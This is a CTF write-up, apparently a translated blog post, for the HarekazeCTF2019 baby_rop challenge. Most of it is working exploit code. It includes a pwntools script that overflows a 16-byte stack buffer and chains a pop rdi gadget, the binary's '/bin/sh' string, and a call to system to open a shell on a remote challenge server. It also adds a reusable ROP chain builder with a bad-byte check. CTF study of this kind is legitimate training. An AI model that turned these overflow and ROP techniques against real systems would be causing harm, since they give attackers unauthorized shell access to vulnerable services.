[HarekazeCTF2019]baby_rop WP

Published on 2021-10-22 · 29 reads


At first I overcomplicated it and did not go for the intended solution; I was off trying to leak the glibc version.

The intended solution is actually as follows.

WP

First, note that this is a 64-bit binary, so arguments are passed in registers (SysV x86-64 ABI: first argument in rdi), not on the stack.

A quick look at the binary shows it already contains a call to system and the string "/bin/sh", so no libc leak is needed.

To pass "/bin/sh" to system we therefore need a pop rdi ; ret gadget; the binary is not PIE, so its address is fixed.

Use the ROPgadget tool to find it.

The script is as follows.

Script

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')
context.terminal = ['konsole', '--separate', '-e', 'python']

io = remote("node4.buuoj.cn", 25217)
# Local debugging: run the binary and break on main's ret to inspect the chain.
# io = process("/home/ksroido/Downloads/babyrop")
# gdb.attach(io, "b *0x40061A")
# pause()
elf = ELF("/home/ksroido/Downloads/babyrop")

# Addresses from ROPgadget / the disassembly; the binary has no PIE, so they are fixed.
pop_rdi_addr = 0x400683   # pop rdi ; ret
binsh_addr = 0x601048     # "/bin/sh" string shipped inside the binary
call_system = 0x4005E3    # call system@plt inside main
main_addr = 0x4005D6      # main, a return target if a leak-then-reuse chain is needed
ret = 0x40061A            # lone ret, usable as a stack-alignment pad if system faults on movaps

# 16-byte buffer + 8-byte saved rbp, then the chain in the return-address slot:
#   pop rdi ; ret  ->  rdi = &"/bin/sh"  ->  call system
payload1 = b'A' * 16 + b'b' * 8 + p64(pop_rdi_addr) + p64(binsh_addr) + p64(call_system)

# First (abandoned) attempt at a GOT leak, laid out 32-bit style; on x86-64 the
# arguments would have to go in rdi/rsi/rdx rather than on the stack.
# payload1 = b'A' * 16 + b'b' * 8 + p64(elf.plt['printf']) + p64(main_addr) \
#            + p64(1) + p64(elf.got['printf']) + p64(0x8)

io.sendline(payload1)

io.interactive()
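The chain builder below is an added example, not code from the original writeup. It reproduces the payload layout of the script above using only the standard library (no pwntools), generalises it to any gadget that pops a known number of registers before its ret, and adds two checks worth running before firing: a scan for bytes that would truncate the input (gets()/fgets() stop at 0x0a) and an optional lone ret to re-align the stack if system() faults on a movaps. The addresses are the ones the writeup uses; the function names are my own.

```python
import struct


def p64(x: int) -> bytes:
    """Little-endian 64-bit pack, the same layout pwntools' p64() produces."""
    return struct.pack("<Q", x)


# Addresses taken from the writeup's analysis of the binary (no PIE, so they are fixed).
POP_RDI = 0x400683      # pop rdi ; ret   (found with ROPgadget)
BINSH = 0x601048        # "/bin/sh" string shipped inside the binary
CALL_SYSTEM = 0x4005E3  # call system@plt inside main
RET = 0x40061A          # lone ret, only needed as a stack-alignment pad


def rop_chain(steps, align_ret=None):
    """Serialize an x86-64 ROP chain.

    Each step is either a plain address (just return there) or a tuple
    (gadget, [values]) for a gadget that pops len(values) registers and then
    rets: the popped values must sit directly after the gadget address on the
    stack, in pop order. If align_ret is given, one extra ret is placed first,
    which shifts rsp by 8; use it when system() faults on a movaps because the
    stack is not 16-byte aligned at the call.
    """
    chain = b""
    if align_ret is not None:
        chain += p64(align_ret)
    for step in steps:
        if isinstance(step, tuple):
            gadget, values = step
            chain += p64(gadget) + b"".join(p64(v) for v in values)
        else:
            chain += p64(step)
    return chain


def find_bad_byte(payload: bytes, bad_bytes=(0x0A,)) -> int:
    """Return the offset of the first forbidden byte in payload, or -1.

    gets()/fgets() stop at 0x0A, so an address containing that byte would be
    truncated (sendline() appends one itself, which is fine at the very end).
    """
    for i, b in enumerate(payload):
        if b in bad_bytes:
            return i
    return -1


def build_payload(buf_size: int, chain: bytes, saved_rbp: bytes = b"b" * 8) -> bytes:
    """Filler for the buffer, a fake saved rbp, then the chain in the return slot."""
    payload = b"A" * buf_size + saved_rbp + chain
    pos = find_bad_byte(payload)
    if pos != -1:
        raise ValueError(f"payload contains a bad byte at offset {pos}")
    return payload


if __name__ == "__main__":
    # Same chain as the writeup: pop rdi ; ret -> &"/bin/sh" -> call system
    chain = rop_chain([(POP_RDI, [BINSH]), CALL_SYSTEM])
    payload = build_payload(16, chain)
    print(payload.hex())
```

With the writeup's offsets, build_payload(16, rop_chain([(POP_RDI, [BINSH]), CALL_SYSTEM])) is byte-for-byte the payload1 the script sends. The gadget itself is the one ROPgadget lists with a filter such as ROPgadget --binary babyrop --only "pop|ret"; if the target had been compiled with PIE, these constants would have to be rebased on a leaked address first.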